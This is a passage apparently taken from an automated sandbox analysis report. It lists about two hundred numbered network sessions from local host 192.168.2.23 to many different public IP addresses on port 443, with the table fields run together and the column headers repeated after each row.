                                          15533192.168.2.2336344168.231.222.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15534192.168.2.2348018105.28.69.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15535192.168.2.2340328218.209.231.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15536192.168.2.2344906216.252.210.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15537192.168.2.233850613.186.246.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15538192.168.2.2332792126.213.20.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15539192.168.2.2349488170.141.32.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15540192.168.2.234481047.86.99.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15541192.168.2.2351848137.195.92.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15542192.168.2.2354412213.142.110.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15543192.168.2.235377446.138.22.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15544192.168.2.2359478166.155.214.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15545192.168.2.2343464138.153.198.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15546192.168.2.235042080.104.142.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15547192.168.2.2342322190.133.27.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15548192.168.2.235339213.126.23.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15549192.168.2.2334424105.72.96.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15550192.168.2.2349262181.21.155.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15551192.168.2.235424489.42.34.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15552192.168.2.2338454186.71.203.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15553192.168.2.235340074.107.219.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15554192.168.2.2341324174.196.214.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15555192.168.2.233923491.35.177.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15556192.168.2.23483721.56.252.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15557192.168.2.2358610173.120.53.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15558192.168.2.234495438.201.82.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15559192.168.2.233306098.227.244.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15560192.168.2.2351470185.233.198.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15561192.168.2.2348158147.181.215.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15562192.168.2.2350822170.45.192.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15563192.168.2.234648442.254.103.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15564192.168.2.234166849.97.244.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15565192.168.2.2357154203.188.205.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15566192.168.2.2344068188.108.202.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15567192.168.2.233324644.21.241.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15568192.168.2.235167657.149.242.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15569192.168.2.2357034118.199.67.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15570192.168.2.236079476.18.6.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15571192.168.2.233766279.88.1.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15572192.168.2.234696235.51.224.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15573192.168.2.2359334144.188.117.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15574192.168.2.2335284182.155.156.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15575192.168.2.2358266142.80.38.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15576192.168.2.235393263.40.31.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15577192.168.2.234650479.153.174.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15578192.168.2.233557632.28.18.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15579192.168.2.23388002.108.71.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15580192.168.2.233976065.32.167.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15581192.168.2.233898453.53.11.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15582192.168.2.2333224174.151.31.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15583192.168.2.2352352136.204.176.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15584192.168.2.2357552189.134.160.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15585192.168.2.235510647.53.143.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15586192.168.2.2354056106.177.214.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15587192.168.2.2353112156.184.198.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15588192.168.2.235920657.148.29.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15589192.168.2.2352374186.247.95.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15590192.168.2.234771865.177.55.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15591192.168.2.235748252.134.180.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15592192.168.2.235705696.154.151.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15593192.168.2.2333764208.128.89.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15594192.168.2.234463431.222.168.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15595192.168.2.2360234107.148.28.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15596192.168.2.2355242132.62.43.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15597192.168.2.2347922102.28.196.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15598192.168.2.2343364221.148.51.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15599192.168.2.2358282145.85.198.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15600192.168.2.2334268189.243.129.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15601192.168.2.235835438.171.84.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15602192.168.2.2348554169.237.168.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15603192.168.2.2352416124.210.48.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15604192.168.2.234706457.241.249.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15605192.168.2.2355508199.228.61.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15606192.168.2.233611668.134.58.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15607192.168.2.2359260216.71.28.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15608192.168.2.2340060146.13.137.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15609192.168.2.235255627.49.242.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15610192.168.2.235877623.58.171.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15611192.168.2.2339706160.176.121.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15612192.168.2.2357044194.182.250.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15613192.168.2.2357736125.19.251.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15614192.168.2.236065246.180.155.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15615192.168.2.233748093.64.30.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15616192.168.2.235048437.1.157.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15617192.168.2.234880246.189.56.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15618192.168.2.2355076122.211.99.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15619192.168.2.2354638144.130.106.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15620192.168.2.2351280120.10.200.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15621192.168.2.2339482136.26.48.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15622192.168.2.235145263.41.56.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15623192.168.2.2340872212.112.187.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15624192.168.2.235233898.175.97.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15625192.168.2.2351378212.200.159.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15626192.168.2.235877486.240.58.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15627192.168.2.235931864.41.67.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15628192.168.2.2350308138.25.91.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15629192.168.2.233468047.29.145.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15630192.168.2.2347770169.37.87.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15631192.168.2.2334890166.41.163.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15632192.168.2.233458881.212.254.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15633192.168.2.235173659.177.76.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15634192.168.2.235291673.247.233.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15635192.168.2.236030089.19.111.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15636192.168.2.2354182114.74.51.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15637192.168.2.235188044.22.20.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15638192.168.2.2343776195.22.167.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15639192.168.2.2357156143.34.5.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15640192.168.2.2346736188.234.101.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15641192.168.2.2351718180.40.137.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15642192.168.2.234176482.149.182.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15643192.168.2.233717273.189.223.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15644192.168.2.2335120149.202.252.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15645192.168.2.2355252172.239.220.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15646192.168.2.2334470131.179.219.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15647192.168.2.2344220111.121.129.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15648192.168.2.233459252.132.166.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15649192.168.2.233291092.30.129.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15650192.168.2.2335770219.236.169.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15651192.168.2.2350520125.40.7.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15652192.168.2.2341016139.225.243.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15653192.168.2.235562449.23.80.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15654192.168.2.2336556119.45.4.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15655192.168.2.235321898.223.164.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15656192.168.2.234600051.190.130.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15657192.168.2.2339418216.162.144.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15658192.168.2.235298899.154.165.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15659192.168.2.2352466223.164.96.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15660192.168.2.2347588163.180.9.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15661192.168.2.2340556179.84.132.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15662192.168.2.2357900154.222.72.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15663192.168.2.2347382120.184.132.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15664192.168.2.2343422173.124.149.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15665192.168.2.2353620133.69.174.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15666192.168.2.2345164202.166.92.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15667192.168.2.2356166164.35.186.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15668192.168.2.2347686148.141.228.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15669192.168.2.2340976181.99.233.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15670192.168.2.233456497.176.185.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15671192.168.2.236040291.128.83.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15672192.168.2.235926684.15.205.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15673192.168.2.2340528186.4.255.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15674192.168.2.23566428.192.73.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15675192.168.2.23576042.103.61.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15676192.168.2.234135243.144.27.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15677192.168.2.234936641.74.192.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15678192.168.2.2351886189.222.249.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15679192.168.2.2343552102.17.10.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15680192.168.2.234574639.18.234.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15681192.168.2.2348498146.172.45.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15682192.168.2.2344570171.64.4.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15683192.168.2.2343448150.241.65.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15684192.168.2.2350748145.128.15.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15685192.168.2.235697642.255.6.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15686192.168.2.233652049.15.177.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15687192.168.2.2347242123.184.61.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15688192.168.2.23554129.21.224.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15689192.168.2.235027040.70.46.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15690192.168.2.233366472.210.16.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15691192.168.2.2344594137.106.89.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15692192.168.2.235558236.93.82.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15693192.168.2.234897892.14.123.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15694192.168.2.2334984143.119.1.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15695192.168.2.233753620.185.154.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15696192.168.2.235643449.129.173.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15697192.168.2.235734247.252.133.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15698192.168.2.234235652.147.157.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15699192.168.2.2336304173.36.239.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15700192.168.2.2340898163.117.174.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15701192.168.2.2352506154.221.66.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15702192.168.2.2356476101.101.97.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15703192.168.2.236033064.142.125.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15704192.168.2.235022035.212.195.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15705192.168.2.2358930199.250.142.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15706192.168.2.2340420205.119.97.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15707192.168.2.2338522140.123.67.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15708192.168.2.235548680.103.127.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15709192.168.2.235812260.150.59.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15710192.168.2.235698464.102.85.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15711192.168.2.2348444160.187.124.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15712192.168.2.23571581.163.67.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15713192.168.2.2337676159.95.178.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15714192.168.2.235918291.211.202.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15715192.168.2.233805854.228.228.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15716192.168.2.236056412.81.120.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15717192.168.2.235815884.38.165.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15718192.168.2.234165473.155.216.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15719192.168.2.233536873.67.153.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15720192.168.2.2349394104.65.217.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15721192.168.2.235473676.63.179.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15722192.168.2.235752832.185.154.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15723192.168.2.2342468101.143.192.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15724192.168.2.23416228.186.48.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15725192.168.2.236058273.90.39.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15726192.168.2.235418823.178.137.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15727192.168.2.2345162205.242.57.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15728192.168.2.2344188145.89.33.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15729192.168.2.236027492.162.198.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15730192.168.2.2353244162.112.129.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15731192.168.2.2336448157.95.219.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15732192.168.2.235891420.1.195.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15733192.168.2.2342286149.203.10.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15734192.168.2.234849639.240.187.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15735192.168.2.2332904182.112.57.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15736192.168.2.2356938131.179.187.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15737192.168.2.2336868107.211.85.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15738192.168.2.235011880.75.134.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15739192.168.2.2338490190.77.185.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15740192.168.2.2353200137.118.173.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15741192.168.2.2339694126.132.153.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15742192.168.2.2351666178.150.233.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15743192.168.2.2336346202.194.30.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15744192.168.2.2342354119.185.255.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15745192.168.2.2358518144.123.25.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15746192.168.2.233881060.80.150.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15747192.168.2.234361635.38.22.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15748192.168.2.2335694105.118.240.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15749192.168.2.234186248.73.111.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15750192.168.2.235512647.252.116.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15751192.168.2.2350312101.234.239.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15752192.168.2.235791418.38.92.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15753192.168.2.235685817.31.81.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15754192.168.2.2349314121.25.83.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
